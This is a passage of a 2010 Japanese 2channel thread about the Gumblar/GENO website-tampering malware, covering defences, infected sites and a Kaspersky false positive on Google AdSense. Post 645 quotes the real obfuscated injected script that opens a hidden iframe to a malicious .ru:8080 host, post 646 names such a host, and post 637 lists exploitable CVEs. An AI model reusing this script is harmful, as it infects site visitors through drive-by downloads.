【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】at SEC
【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】 - 暇つぶし2ch629:名無しさん@お腹いっぱい。
10/01/25 01:13:50
javaを有効にするの欄もクリアにしておいたほうがいいのかな?

630:名無しさん@お腹いっぱい。
10/01/25 01:14:06
>>590
企業ではIE6のところが多いんじゃないかな。
とくに自社開発システムを使う大企業。
IE6はセキュリティの関係で使わざる得ない。7以上にするとセキュリティが高すぎて
業務システムが動かない。


631:名無しさん@お腹いっぱい。
10/01/25 01:17:09
>>515
JREって保護モード対応してるから、Vista/7でIEを保護モード下で動かしてると、
JREの脆弱性を突かれてもシステムには影響ないんだよな

JREバグの検証コードで実験したけど、保護モードで動かしたときは大丈夫だった

632:名無しさん@お腹いっぱい。
10/01/25 01:21:02
>>588
不具合の出る特定ソフトは
DEPの例外に登録すればいい気がするが・・・?

633:名無しさん@お腹いっぱい。
10/01/25 01:24:55
>>575
普及率が高いものはターゲットになるから、普及率がひくけりゃ低いほど狙われにくい
だから、NetBSDとかOpenBSDとかだれも使ってないOSが安全

634:名無しさん@お腹いっぱい。
10/01/25 01:28:16
DEPって標準では重要なシステムファイルのみってなってなかった?
おれは設定変更してすべてのプログラムで有効にしてる

635:名無しさん@お腹いっぱい。
10/01/25 01:29:50
>>629
きちんとアップデートしておけば発動することはないんだから有効のままでいい。
たとえ発動しなくても引っかかること自体が嫌なら無効にすればいい。

636:名無しさん@お腹いっぱい。
10/01/25 01:30:20
デフォがセキュアでも
ユーザーは穴開けまくる

637:名無しさん@お腹いっぱい。
10/01/25 01:38:18
>>555
乙!

> Outlook Expressのメールすべてを…url…に送信する
そこんとこは「CVE-2008-2463」だお

SnapShot Viewerの SnapshotPath と CompressedPath と PrintSnapshotを
ごにょごにょすると、…url…が実行できちゃうみたいね

ついでだから感染したい人向けの環境書いとくよ

・MDAC(CVE-2006-0003)
 SP3より前のWindows XPで2006年4月の月例パッチを未適用に
・SnapShot Viewer(CVE-2008-2463)
 2008年8月の月例パッチ未適用の古いSnapShot Viewerをインストール
・Microsoft Video ActiveX Control(CVE-2008-0015)
 2009年7月のパッチ未適用のDirectShow(Windows)をインストール(デフォルト入ってる?)
・Adobe Reader
 8.1.2以下のVer.8→util.printf(CVE2008-2992)コース
 9.2.0にしる→newPlayer(CVE-2009-4324)コース
 7.1.0より前のVer.7→Collab.collectEmailInfo(CVE-2007-5659)コース
  Acrobat Script(ReaderのJavaScriptな)でバージョン分けしてるから、
  この3パターンのどれかしかだめだお
・JRE(CVE-2008-5353)
6 Update 11より前、5.0 Update 17より前 、1.4.2_19より前のJREのどれか

DEPの有効化やスクリプト無効化は禁止ね
うまく組み合わせないと好みの攻撃が受けられないから注意してね
感染チャンスは1日1回、IP変えないとはじかれちゃうぞ

ほかに足りないものある > all

638:名無しさん@お腹いっぱい。
10/01/25 01:42:22
>>555>>637も乙

639:名無しさん@お腹いっぱい。
10/01/25 02:10:39
GPLとLGPLとExceptionでPegel

640:名無しさん@お腹いっぱい。
10/01/25 02:29:43
>>621
GENOの時には官公庁かなりやられたよ。
ライブカメラ持ちの国交省出先のは、一ヶ月前に見てたからぞっとした。
8080になってからはどうだったか忘れた。

641:名無しさん@お腹いっぱい。
10/01/25 02:56:20
陥落したらまずいサイトってのは日本じゃ何をおいてもYahoo! JAPANトップだわな。
恐らく日本語サイトでは1日あたりのページビューが最も多いページ。

あそこがやられると、被害は「甚大」の一言で言い表せるものではなくなるだろう。

Yahoo! JAPANのセキュ担当、頼んだぞ!

642:名無しさん@お腹いっぱい。
10/01/25 03:05:01
>>637みたく改めてリスト化されると、ここまで落とさないと感染できない事実に驚くわ。

643:名無しさん@お腹いっぱい。
10/01/25 03:10:16
ここまで落とさなくとも感染はするぞw

644:名無しさん@お腹いっぱい。
10/01/25 03:14:02
なんなの感染したい人向けって

気持ち悪(´・∀・`)

MじゃなくてGだね(^Д^)

645:名無しさん@お腹いっぱい。
10/01/25 03:14:05
W7cw9590 = 'i^@c($)i!o(^-(u^(#!s@.)!!d#a^^u^(&&m&^!#.$#&$(n!!&e^)$$&t(&.!@&!o!c$n^!-&n#(e##-(#!#j!&$!p#@).!(c)^$!o#!^m(e@@&t)r()#u)&^e@s!^)t#()a#r!)^^.@r&u#'.replace(/\!|\$|&|#|\)|@|\(|\^/ig, '');
O1waipyz = document.createElement('if'+'rame');
O1waipyz.style.visibility = 'h!(#i^?d^@@d^^&e&^((n&)#'.replace(/\(|\$|#|&|@|\^|\)|\!/ig, '');
O1waipyz.src = 'http://'+W7cw9590+':8080/index.php?sc';
document.body.appendChild(O1waipyz);

646:名無しさん@お腹いっぱい。
10/01/25 03:15:02
URLリンク(icio-us.daum.net.ocn-ne-jp.cometruestar.ru:8080)

647:名無しさん@お腹いっぱい。
10/01/25 03:31:51
直リンするなよ

648:名無しさん@お腹いっぱい。
10/01/25 03:33:23
      ζ
      / ̄ ̄ ̄ ̄\
     /         \
    /\    \  / |
    |||||||   (・)  (・) |
    (6-------◯⌒つ | < バカモ~ン! また直リンしおって!
    |    _||||||||| |
     \ / \_/ /
       \____/

649:名無しさん@お腹いっぱい。
10/01/25 03:44:48
ガンブラーの目的は、ボットの分散ネットワークを作って何がしたいの?

650:名無しさん@お腹いっぱい。
10/01/25 04:29:46
オワタ
スレリンク(bizplus板)

651:650
10/01/25 04:31:21
すまん、誤爆した

652:名無しさん@お腹いっぱい。
10/01/25 05:59:46
>>649
一気にどこかを攻撃

653:名無しさん@お腹いっぱい。
10/01/25 06:25:19
日々新しい亜種が生まれてるのはわかるけど、このスレで既出の奴に感染していないかを調べるにはどうすればいい?

654:名無しさん@お腹いっぱい。
10/01/25 06:32:10
>>653の補足:訪れるサイトではなく自分のパソコンの感染

655:名無しさん@お腹いっぱい。
10/01/25 06:39:26
まずセーフモードで起動します。

656:名無しさん@お腹いっぱい。
10/01/25 06:54:36
次に服を脱ぎます。

657:名無しさん@お腹いっぱい。
10/01/25 06:59:42
そして呪文を唱えます。

658:名無しさん@お腹いっぱい。
10/01/25 09:00:52
ふぁっく!おまいらそういうのばっかだな!

659:名無しさん@お腹いっぱい。
10/01/25 09:29:38
>>7 の
「コントロールパネル」 -> 「管理ツール」 -> 「サービス」 -> 「Remote Procedure Call」を選択する。
「Remote Procedure Call (RPC) エンド ポイント マッパーや各種の RPC サービスを提供します。」

スタートアップの種類が、自動のまま動かせないのですが。
その下のRemote Procedure Call(RPC)Locatorは変えられます。
こちらを切っておけばよいのでしょうか?

660:名無しさん@お腹いっぱい。
10/01/25 09:30:29
くっ!ガッツが足りない!

661:名無しさん@お腹いっぱい。
10/01/25 11:16:50
URLリンク(nextxp.net)
ここみたらRemote Procedure Callは絶対に自動ってあるけど
Remote Procedure Call(RPC)Locatorは手動ってあるし・・・
どうしよう

662:名無しさん@お腹いっぱい。
10/01/25 11:26:07
>>630
そんな"セキュリティにこだわった"環境で、"ネットサーフィン"すんなよ、って話。

663:名無しさん@お腹いっぱい。
10/01/25 12:47:34
>>618
スクリプトが直接悪さをしてるわけではないから、基本的な対策はしたうえで
火狐+RequestPolicy(アドオン)でスクリプト有効にして問題ないっぽい。

例えば581は以下のようになる(スクリプトON、RequestPolicy+Flashblock)
URLリンク(www.dotup.org)

自分で許可したりホワイトリストに入ってなければ、大元のサイト以外へのアクセスはブロックされる。
で、画像のログの下から2番目のアクセス先があれなわけだw 長文失礼!

664:名無しさん@お腹いっぱい。
10/01/25 12:50:24
みすったパス付きだった^^;こっちね↓
URLリンク(www.dotup.org)

665:名無しさん@お腹いっぱい。
10/01/25 13:01:03
>463
管理人にメール出した後も変化無しだったんで,
今朝AAA!CAFEに連絡したら,やっと改竄箇所が削除されてました。
トップページで告知してくれたらいいんだけど。

666:名無しさん@お腹いっぱい。
10/01/25 13:03:13
>>567
連絡してやったら、Web製作費がリーズナブルだったから発注したそうだ

「お知らせ下さってありがとうございます お礼に家具をお安くいたします」とのことだったw

667:名無しさん@お腹いっぱい。
10/01/25 13:09:51
金曜日に感染しました。

やたら、TM6.tmpだの、TM1A.tmpだの
通信をしたいとFWのポップアップがでるから
おかしいと思ってたら・・・。

TM6.tmp類の削除とレジストリからも消したのだが、
siszyd32.exeが見つからない。
と思ってたら、wwwpos32.exe でした。

FFFTPに何個か設定があったのですが、
今のところWebの改竄は確認できてません。、
TM6.tmpの通信をブロックしてたので、
情報は漏れなかったのかも?







668:名無しさん@お腹いっぱい。
10/01/25 13:17:26
…と楽観視していてやられたサイトは沢山あるんじゃね。
htmlだけ見てたらjsやられてたとか単純に後回しにされてるとか。

669:名無しさん@お腹いっぱい。
10/01/25 13:49:48
>>659
>>661
素人はRPCを絶対いじるな
URLリンク(blog.goo.ne.jp)
URLリンク(soudan1.biglobe.ne.jp)
URLリンク(weblabo.griffonworks.net)

670:名無しさん@お腹いっぱい。
10/01/25 14:12:21
>>480
いまは感染サイトは閉鎖されて、ブログ書き変わっているんだけど、

> 現在、
> 「カーポスト」「横浜陸事の代書屋」のホームページを
> 閉鎖しております。

> また、対策方法として下記の手続きを施します。
> 当事務所ホームページにより感染してしまわれた方には
> 大変ご迷惑をおかけいたしまして誠に申し訳ございません。
> FTPソフトを利用なさらない方には実害はないかも
> しれませんが、対応方法等を記載致します。

実害ないんだっけ???

671:名無しさん@お腹いっぱい。
10/01/25 14:12:45
>>663
基本的な対策をしていればRequestPolicyなんて不要だろ。
そもそもログが不要ならRequestPolicyと同じことはFirefoxの本体機能だけで可能。

672:名無しさん@お腹いっぱい。
10/01/25 14:16:16
>>669
マジで。今日いじったばっかりだったよ。
素人判断で迂闊に手出しちゃ駄目だなぁ。

673:名無しさん@お腹いっぱい。
10/01/25 14:19:58
>>672
よかったねぇ、先に戻し方がわかって。

674:名無しさん@お腹いっぱい。
10/01/25 14:31:44
RequestPolicyはガチガチにすると閲覧するときレイアウトくずすからなー
それにもっさり重くなるし


675:名無しさん@お腹いっぱい。
10/01/25 14:36:57
>>672
再起動後に症状が出るはずだから、今のうちに必要な部分はテキスト保存しておけ
セキュリティソフトも立ちあがれなくなり、最悪ネットに接続することすらやばくなる
>>7コピペは次スレからどう扱うべきかね

676:名無しさん@お腹いっぱい。
10/01/25 14:49:11
最悪OSリカバリーでも泣かない!超自己責任でやりたきゃやれ!
とかテンプレの頭とケツに行間空けて書いておくとか

677:名無しさん@お腹いっぱい。
10/01/25 14:54:43
>>670

> 293 :名無しさん@お腹いっぱい。:2010/01/22(金) 02:08:43
> 手持ちの*.ru:8080な奴をISPとGoogleさんちのDNSで試したけど
> 全部IPが引けなくなってしまった

GNU GLP/LGPLのドメインが一掃されたみたいだから
21日までビンゴ、22日から実害なし…かな

678:名無しさん@お腹いっぱい。
10/01/25 15:18:53
>>675
>>7 は統合セキュリティソフトやFirewallで閉じてるだろうから「いらない」に一票
正直セキュリティソフトも入れてないやつまで面倒見切れん

679:名無しさん@お腹いっぱい。
10/01/25 15:30:28
痛いニュースが感染しているらしい。
誰か確認して~。


124 名前:Trackback(774)[] 投稿日:2010/01/25(月) 14:14:53 ID:Klq45gB4
サイトがトロイの木馬に感染してる?

125 名前:Trackback(774)[] 投稿日:2010/01/25(月) 14:41:52 ID:ABVnF2MI
カスペル兄貴に怒られたよ

スレリンク(blog板:124-番)

680:名無しさん@お腹いっぱい。
10/01/25 15:34:18
>>679
チェッカーじゃかからんがaguseでいったらTrojan.JS.Redirector.arだとさ

681:名無しさん@お腹いっぱい。
10/01/25 15:34:49
tcupの掲示板のいたるところで
Trojan.JS.Redirector.arって出るんだが
これカスペの誤検出なのかな?

682:名無しさん@お腹いっぱい。
10/01/25 15:35:14
Trojan.JS.Redirector.arが検出されました

683:名無しさん@お腹いっぱい。
10/01/25 15:37:28
>>235
のサイト踏んじゃったんだけど…
オンラインスキャンで反応でなければセーフでしょうか

684:名無しさん@お腹いっぱい。
10/01/25 15:41:43
もうどんなサイトも掲示板も安心できないこんな世の中じゃ

685:名無しさん@お腹いっぱい。
10/01/25 15:42:25
ポイズン

686:名無しさん@お腹いっぱい。
10/01/25 15:42:49
wikiwiki.jp感染してる?

687:名無しさん@お腹いっぱい。
10/01/25 15:43:39
RRASってホームエディションは使えないんだっけ?

688:名無しさん@お腹いっぱい。
10/01/25 15:44:47
>>681
aguseでいくとでるね
これなんだろう

689:名無しさん@お腹いっぱい。
10/01/25 15:49:24
したらばなんてトップページでTrojan.JS.Redirector.ar出るし

690:名無しさん@お腹いっぱい。
10/01/25 15:51:40
これ、アフィリエイトとか広告を誤検出してんじゃねぇの?

691:名無しさん@お腹いっぱい。
10/01/25 15:52:20
ν速にスレ立ってるなw

692:名無しさん@お腹いっぱい。
10/01/25 15:53:42
あちこち移動する度に「Trojan.JS.Redirector.ar」発見してカスペルスキーが怒るw
昨晩まで普通に見れたサイトばかりなんだが…

693:名無しさん@お腹いっぱい。
10/01/25 15:55:16
なんか一気に感染広がってる感じがするなあ

694:名無しさん@お腹いっぱい。
10/01/25 15:59:14
カスペ(笑)なら誤検出だろ
あそこゴミじゃんwwww

695:名無しさん@お腹いっぱい。
10/01/25 15:59:29
>>691
うrl

696:名無しさん@お腹いっぱい。
10/01/25 16:00:33
痛いニュースウイルス感染か?
スレリンク(news板)
これか?

697:名無しさん@お腹いっぱい。
10/01/25 16:00:40
GoogleのAdSenseに反応してるみたいだが

698:名無しさん@お腹いっぱい。
10/01/25 16:01:09
URLリンク(pagead2.googlesyndication)●com/pagead/show_ads.js

↑これじゃねぇの?って噂もあるみたいだけど
(こんなんその辺のサイトに埋め込まれまくりやん)

気力のある人はスクリプトを解析してみそwオレはごめんだがw

699:名無しさん@お腹いっぱい。
10/01/25 16:01:23
カスペだとひっかかるこれを誰かウィルストータルに送ってくれ
URLリンク(pagead2)●googlesyndication●com/pagead/show_ads●js

700:名無しさん@お腹いっぱい。
10/01/25 16:01:45
googlesyndicationに反応してるのかね
誤検出ぽいなこれ

701:名無しさん@お腹いっぱい。
10/01/25 16:01:57
カスペ以外では何の問題もないんだから気にする必要はないな

702:名無しさん@お腹いっぱい。
10/01/25 16:04:02
>>698
これを誤検出しているようじゃ行く先々でアラートの嵐だろうな。

703:名無しさん@お腹いっぱい。
10/01/25 16:04:34
>>698-699
俺もそれだ。どう考えても誤検出だよなやっぱ
いちいち警告音鳴るのが凄く嫌だw

704:名無しさん@お腹いっぱい。
10/01/25 16:05:09
>>698
これをトロイって検出してるな
したらば掲示板を初めそこらじゅうで検出されてうざくてたまらん

705:名無しさん@お腹いっぱい。
10/01/25 16:06:27
グゥュエイイアアアアアアア!!!!

この音怖すぎ

706:名無しさん@お腹いっぱい。
10/01/25 16:07:10
カスペなんて使ってるからこうなるんだ
大人しくZEROとか使ってれば大丈夫

707:名無しさん@お腹いっぱい。
10/01/25 16:07:11
既に誰か投げてた

show_ads.js 1/40
URLリンク(www.virustotal.com)

Kaspersky 7.0.0.125 2010.01.25 Trojan.JS.Redirector.ar

708:名無しさん@お腹いっぱい。
10/01/25 16:07:23
またカスペか・・・

709:名無しさん@お腹いっぱい。
10/01/25 16:07:50
>>706
冗談がお上手ね♪

710:名無しさん@お腹いっぱい。
10/01/25 16:08:20
>>709
カスペよりZEROの方が優秀ってのは皆知ってます

711:名無しさん@お腹いっぱい。
10/01/25 16:09:37
カスペルスカイって誤検出ばかりだな

712:名無しさん@お腹いっぱい。
10/01/25 16:12:42
この30分で「Trojan.JS.Redirector.ar」のGoogleでのヒット数が0から10まで増えた
急上昇ワードの26位になってるw

713:名無しさん@お腹いっぱい。
10/01/25 16:17:40
>>712
俺がググった時はこのスレがトップに出てきたわw

「Trojan.JS.Redirector.arって警告が出るぞ!」
「カスペがTrojan.JS.Redirector.ar検出してうるさいんだが」
「Trojan.JS.Redirector.arって何だ?」
「ググってみようぜ!」
「お、早速情報出てきた出てきた」
「…ってこれ俺達だし!!」

714:名無しさん@お腹いっぱい。
10/01/25 16:20:26
さすがネラー
こういった情報だけは異様にはやいな

715:名無しさん@お腹いっぱい。
10/01/25 16:20:31
カスユーザーざまぁ

716:名無しさん@お腹いっぱい。
10/01/25 16:20:38
吹いたw

717:名無しさん@お腹いっぱい。
10/01/25 16:25:24
>>678
>>7 はルータ使ってない人用って明記しとけばおk。

718:名無しさん@お腹いっぱい。
10/01/25 16:32:53
カスペの検出は正しかったみたい

719:名無しさん@お腹いっぱい。
10/01/25 16:33:35
>>718
冗談だろwww
俺のは全く反応してないぞww

720:名無しさん@お腹いっぱい。
10/01/25 16:38:16
誤検出じゃなかったらGumblarの比ではないくらい広まってることになるなw

721:名無しさん@お腹いっぱい。
10/01/25 16:38:43
どう考えても誤検出です。

722:名無しさん@お腹いっぱい。
10/01/25 16:38:44
show_ads.js 最終的にこうなった
URLリンク(labs-uploader.sabaitiba.com)

723:名無しさん@お腹いっぱい。
10/01/25 16:39:40
誤検出でなければググル先生がウンコ漏らすレベル

724:名無しさん@お腹いっぱい。
10/01/25 16:40:06
誤検出じゃなけりゃ大惨事だなw

725:名無しさん@お腹いっぱい。
10/01/25 16:40:53
>>718
カカスペの誤検知じゃないの?

ググって見るサイトのあっちこっちで、トトロイ続出なんだけど

726:名無しさん@お腹いっぱい。
10/01/25 16:42:21
トトロイって何か可愛げやのうw

727:名無しさん@お腹いっぱい。
10/01/25 16:43:20
カスペはこれだから駄目なんだよな

728:名無しさん@お腹いっぱい。
10/01/25 16:43:48
グーグルアドセンスか何かのjsに反応してるから
あちこちのサイトで検出されてるんだろ。
誤検出じゃなかったらスゲーとは思うんだが、
いちいちうるさくて困る。

729:名無しさん@お腹いっぱい。
10/01/25 16:45:33
>>723
漏らすね

730:名無しさん@お腹いっぱい。
10/01/25 16:59:43
   ハ,,..,,ハ
  /;;・ω・;;ヽ 
.  (;( ^^^ );)
  `'ー---‐´
トトロイ
(2010~)

731:名無しさん@お腹いっぱい。
10/01/25 17:02:14
>>730
かわええw

732:名無しさん@お腹いっぱい。
10/01/25 17:02:33
仕事早いよw

733:名無しさん@お腹いっぱい。
10/01/25 17:03:20
>>725は書写中枢障害の初期状態

734:名無しさん@お腹いっぱい。
10/01/25 17:04:24
>>659
Remote Procedure Call とめたらOSさえ起動しなくなったり、
OS起動にめっちゃ時間がかかったり、ほとんどのアプリが動かなくなったりするよ

WindowsNTとかでは止めれたんだけど、止めて動かなくなるバカが増えたのか
いつのまにか標準UIからは止められなくなった

735:名無しさん@お腹いっぱい。
10/01/25 17:04:37
トロイの検出ダイアログが一件に付き2つ出ることを表してるんじゃないの?
ダダイヤログって書くべきだったか。

736:名無しさん@お腹いっぱい。
10/01/25 17:05:28
俺もトトロイ検出しねえかな

737:名無しさん@お腹いっぱい。
10/01/25 17:06:51
トトロイはエロ動画を主食とします

738:名無しさん@お腹いっぱい。
10/01/25 17:08:47
googleの広告を誤検知かよ

739:名無しさん@お腹いっぱい。
10/01/25 17:11:03
カスペ「googleはトロイ」

740:名無しさん@お腹いっぱい。
10/01/25 17:11:13
google先生のshow_ads.jsは誤検知だな
本当にgoogle先生がやらかしたら世界中大騒ぎだわ

ふだんadblockで広告とめてるから警告さえでなかった

741:名無しさん@お腹いっぱい。
10/01/25 17:11:33
>>669
ありがとうございます。
ポート番号「445」をいじったらオンラインにつながれなくなり
ばたばたしていてレスが遅れて申し訳ありません。

URLリンク(soudan1)●biglobe●ne●jp/qa3068747.html

ここからトロイ検出が出て少しびっくりしてしまいましたが、
誤検出?のようですね。

742:名無しさん@お腹いっぱい。
10/01/25 17:11:33
地球\(^o^)/オワタ

743:名無しさん@お腹いっぱい。
10/01/25 17:12:33
googleアドセンス使ってるサイト全部ウイルス扱いかよw

カスペさん本気出したな

744:名無しさん@お腹いっぱい。
10/01/25 17:13:24
トトロイの鳴き声は凶悪だなぁ

745:名無しさん@お腹いっぱい。
10/01/25 17:13:57
グーグル先生を敵に回すと大変なことになっちまう

746:名無しさん@お腹いっぱい。
10/01/25 17:14:24
怒ってグーグルが無料のアンチウイルスソフト作ったらおもろいんだが。

747:名無しさん@お腹いっぱい。
10/01/25 17:17:12
google先生も難読化してるのか

748:名無しさん@お腹いっぱい。
10/01/25 17:18:50
google先生のjsも、javascript使ってリダイレクトしてるから、
JS redirectorにはかわらないな

749:名無しさん@お腹いっぱい。
10/01/25 17:19:07
>>746
それはむしろ作ってほしいな

750:名無しさん@お腹いっぱい。
10/01/25 17:19:38
これでGoogleの検索結果からカスペ関連のサイトが消えたら面白いんだがなw

751:名無しさん@お腹いっぱい。
10/01/25 17:19:40
google vs カスペ
最終決戦がはじまる

752:名無しさん@お腹いっぱい。
10/01/25 17:20:51
よりによってgoogle先生にケンカを売るとは・・・

753:名無しさん@お腹いっぱい。
10/01/25 17:22:19
google vs カスペとか決戦にならねえだろ

754:名無しさん@お腹いっぱい。
10/01/25 17:22:46
>>741
うそー開いちゃったよー

755:名無しさん@お腹いっぱい。
10/01/25 17:23:35
URLリンク(japan.cnet.com)
Google先生はAvast!を採用
カスペの時代は終わったね。

756:名無しさん@お腹いっぱい。
10/01/25 17:26:45
Googleとカスペルスキー

\\ == \    __           _┌┐
 [ [_二二_\_/./∠勹ヽ   ロロロ\| |. ̄.「 ̄l\[ ̄|\
  | .| - ┌‐─‐┤∠   ∠几 _ .「= | = | [  勹..|  l   | .| |
  | .| ‐ │匸 ̄ |フ /  = 」|. |.|ⅵ= .|.=.」 |  勹.|  レ、 | .| |
 「 「 ‐ │×′く[,..、|フ = ∠|ノノ 匸 __コ/ [´ |__/. |__」 |
 レィ ̄凵 L/\\| .| .λ  |、_,,/|  凵 [_∧__/ 、__/\_/
. \_イ__∧_二二二λ二/   ¨\_,.‐‐‐^-‐′

757:名無しさん@お腹いっぱい。
10/01/25 17:28:26
>>741
そっちかよw
もう>>7は次スレから不要に一票
手練は最初からわかって対処しているだろうし、下手に注釈つけても素人相手じゃどうしようもないわ

758:名無しさん@お腹いっぱい。
10/01/25 17:28:28
まさにがっぷり四つ!

759:名無しさん@お腹いっぱい。
10/01/25 17:29:41
ぐぐるあどはってる有名サイトどこ

760:名無しさん@お腹いっぱい。
10/01/25 17:30:10
利用者にことわりもなしに無断で広告表示するジャバスクリプトなんてウイルスとかわらんだろ
Googleアドセンスはウイルス扱いでいいよ

761:名無しさん@お腹いっぱい。
10/01/25 17:33:20
RPC止めるなんて危険なことしないでRRASでいいんじゃん?

762:名無しさん@お腹いっぱい。
10/01/25 17:33:44
カスペルスキー△「Googleはウイルス」
スレリンク(news板)

763:名無しさん@お腹いっぱい。
10/01/25 17:34:16
   ハ,,..,,ハ
  /;;・ω・;;ヽ 
.  (;( ^^^ );)
  `'ー---‐´
  _,,_ ∩
 (^Д^)/
 ⊂  ノ とったどー
  (つ ノ
  (ノ


764:名無しさん@お腹いっぱい。
10/01/25 17:38:53
>>741のリンクは誤検出でFA?

765:名無しさん@お腹いっぱい。
10/01/25 17:39:19
「Trojan.JS.Redirector.ar」でググると、もう142件もヒットするようにw
急上昇ワードでも15位に上がりました

766:名無しさん@お腹いっぱい。
10/01/25 17:39:49
カスペのGoogleアドセンスは全部誤検出でしょ?

767:名無しさん@お腹いっぱい。
10/01/25 17:42:41
カスペ公式フォーラムにきた
Googlesyndication - Trojan.JS.Redirector.ar - Kaspersky Lab Forum
URLリンク(forum.kaspersky.com)

カスペルスキーの30日体験版を使用しているのですが
Trojan.JS.Redirector.arというトロイの木馬が検出されるのですが削除できなくて困っています。
URLリンク(detail.chiebukuro.yahoo.co.jp)

「trojan.js.redirector」はトロイの木馬?
URLリンク(blogs.yahoo.co.jp)

768:名無しさん@お腹いっぱい。
10/01/25 17:46:20
Google AdSenseのヘルプフォーラム
Kaspersky Internet Security 2010でトロイの木馬と検知される
URLリンク(www.google.com)

769:名無しさん@お腹いっぱい。
10/01/25 17:52:33
カスペって更新テストやってからファイル配信してないんじゃねーの?
こんなもんテストやってればすぐ気付くレベルだろ~?

770:名無しさん@お腹いっぱい。
10/01/25 18:00:22
>>730
かわゆすなぁ

771:名無しさん@お腹いっぱい。
10/01/25 18:08:44
モフモフしそうだぎゃ

772:名無しさん@お腹いっぱい。
10/01/25 18:13:10
ウィキペディアでGENO社員がGENOウイルスを隠している模様
スレリンク(news板)

773:名無しさん@お腹いっぱい。
10/01/25 18:27:59
× GENO
○ Gumblar

774:名無しさん@お腹いっぱい。
10/01/25 18:37:34
ト、ト、トレンドマイクロのつ、つぎは
カ、カカ、カスペ・・・な、なんだなぁ~
ぼぼぼ、ぼクはおむすび欲(ry+AA略

775:名無しさん@お腹いっぱい。
10/01/25 18:54:53
また火狐野朗がなんかいっちゃってんのか

776:名無しさん@お腹いっぱい。
10/01/25 18:57:08
>>772
またGENOか!
今ウイルスが蔓延したのはそいつらのせいといってもいいのに
あいつら全然反省してないんだな
もう業務停止命令出せや

777:名無しさん@お腹いっぱい。
10/01/25 18:59:26 BE:452633292-PLT(12031)
そのりくつは おかしい

778:名無しさん@お腹いっぱい。
10/01/25 19:08:25
RequestPolicyを押してるけど
外部ドメインじゃなきゃ安全とかよくいえるな
FTPのっとられてればなんでもできるっての


779:名無しさん@お腹いっぱい。
10/01/25 19:09:35
>>736
このへんないきものは こっそりあなたのPCにいるのです。たぶん。

780:名無しさん@お腹いっぱい。
10/01/25 19:22:40
>>779
なにそれこわい

781:名無しさん@お腹いっぱい。
10/01/25 19:26:37
>>779
なにそれこわい


でも>>730のみたいなのが画面の中歩いてたら消さないだろうな

782:名無しさん@お腹いっぱい。
10/01/25 19:30:25
衆議院議員トトロイ
www●kishida●gr●jp
/*Exception*/

関係無いけどGoLiveのゴミソース
<csscriptdict import>
<script type="text/javascript" src="file:///C:/Documents and Settings/ukkiy/Application Data/Adobe/Adobe GoLive/Settings/JScripts/GlobalScripts/CSScriptLib.js"></script>
</csscriptdict>

ukkiy逃げて~

783:名無しさん@お腹いっぱい。
10/01/25 19:39:36
>>782
さすが自民クオリティw

URLリンク(megalodon.jp)

784:名無しさん@お腹いっぱい。
10/01/25 19:40:01
>>782
メールで対処お願いしました
とりあえずはトップページだけみたいですね

785:名無しさん@お腹いっぱい。
10/01/25 19:41:18
>>783
民主の支部も改竄されなかったか?

786:名無しさん@お腹いっぱい。
10/01/25 19:49:44
されとったな

787:名無しさん@お腹いっぱい。
10/01/25 19:52:15
>>783は直リンしても大丈夫なの?

788:名無しさん@お腹いっぱい。
10/01/25 19:53:17
>>666
家具が安くなるのはいいんだけど
まだ直ってないのね,そこ

789:名無しさん@お腹いっぱい。
10/01/25 20:13:34
>>787
魚拓ページまでなら大丈夫
それ以上は感染対策してから池

790:名無しさん@お腹いっぱい。
10/01/25 20:14:17
URLリンク(www.dotup.org)

791:名無しさん@お腹いっぱい。
10/01/25 21:00:06
最近よくGoogle先生喧嘩売られるね

792:名無しさん@お腹いっぱい。
10/01/25 21:47:45
カスペ早く更新来てくれ
ギャーギャーうるせぇ

793:名無しさん@お腹いっぱい。
10/01/25 22:05:34
>>792
カスペスレでやれ
【総合力で】Kaspersky Lab Part96【他社を圧倒】
スレリンク(sec板)

794:名無しさん@お腹いっぱい。
10/01/25 22:14:09
URLリンク(www)<)●googlesyndication●com/pagead/show_ads.js//show_adsから
Trojan.JS.Redirector.arを検出するんだが
>>698-699の通り誤検出ってことでいいのかな


795:名無しさん@お腹いっぱい。
10/01/25 22:20:51
誤検出だからもうその話は終われ
23時頃修正くるらしいし

796:名無しさん@お腹いっぱい。
10/01/25 22:38:15
>>795了解。
修正に期待。

797:名無しさん@お腹いっぱい。
10/01/25 22:42:14

====以下誤検出スレ====


798:名無しさん@お腹いっぱい。
10/01/25 22:52:35
まだ誤検出と決まったわけではない!

799:名無しさん@お腹いっぱい。
10/01/25 23:38:30
URLリンク(www.just-kaspersky.jp)

800:名無しさん@お腹いっぱい。
10/01/26 01:37:20
IEでセキュリティレベルを高にするとjavaが無効になる分、動画サイトが見れなくなっちゃうんだけど
特定のアドレスを指定して、そのページだけjavaが有効になるっていう設定ってできる?

たとえば、いつもはセキュリティレベル高だけど、ようつべだけはセキュリティレベル中(java有効)になるとか
毎回レベルを指定するのが面倒だ

801:名無しさん@お腹いっぱい。
10/01/26 01:44:02
火狐とかならお気にいりに入れてるサイトごとにセキュリティ設定出来るよ

802:名無しさん@お腹いっぱい。
10/01/26 01:44:59
サイト登録すれば言いだけ
火狐野朗の自演か

803:名無しさん@お腹いっぱい。
10/01/26 01:46:23
IEでもな

804:名無しさん@お腹いっぱい。
10/01/26 01:47:55
>>800
インターネットオプションのセキュリティで
信頼済みサイトに登録すればいける。

でも火狐やプニルの方が楽といえば楽かな。

805:名無しさん@お腹いっぱい。
10/01/26 01:50:43
IEの良いところ : Firefoxをダウンロードできる

806:名無しさん@お腹いっぱい。
10/01/26 01:51:28
javaいれてなくてIEでセキュリティ高にしてあっても動画サイト見れるんだけど
これってなんか設定間違ってるってこと?

807:名無しさん@お腹いっぱい。
10/01/26 01:58:31
>>804
信頼済みサイトのセキュリティレベルを中にして
URLリンク(www.youtube.com)を追加したけど見れない

プニルの個別設定でようつべをjava有効にしてみたけど見れない

なぜだ……

808:名無しさん@お腹いっぱい。
10/01/26 02:07:33
>>807
設定後、ブラウザ再起動した?

809:名無しさん@お腹いっぱい。
10/01/26 02:08:20
また糞狐が変なこと言い出したのか
さすがテンプレでnoscriptだか宣伝するだけあるな

810:名無しさん@お腹いっぱい。
10/01/26 02:12:18
>>808
した。だが見れない

つべ以外の動画サイトも登録してはみたが、新しいjavaを入れろと表示されるだけ
もちろん、javaは最新版にしてあるし、セキュリティレベルを中に設定すれば問題なく見れる

811:名無しさん@お腹いっぱい。
10/01/26 02:16:53
youtubeにjavaなんか使ってるか
javascriptのこといってるのか

812:名無しさん@お腹いっぱい。
10/01/26 02:17:28 BE:1584217297-PLT(12031)
>>810
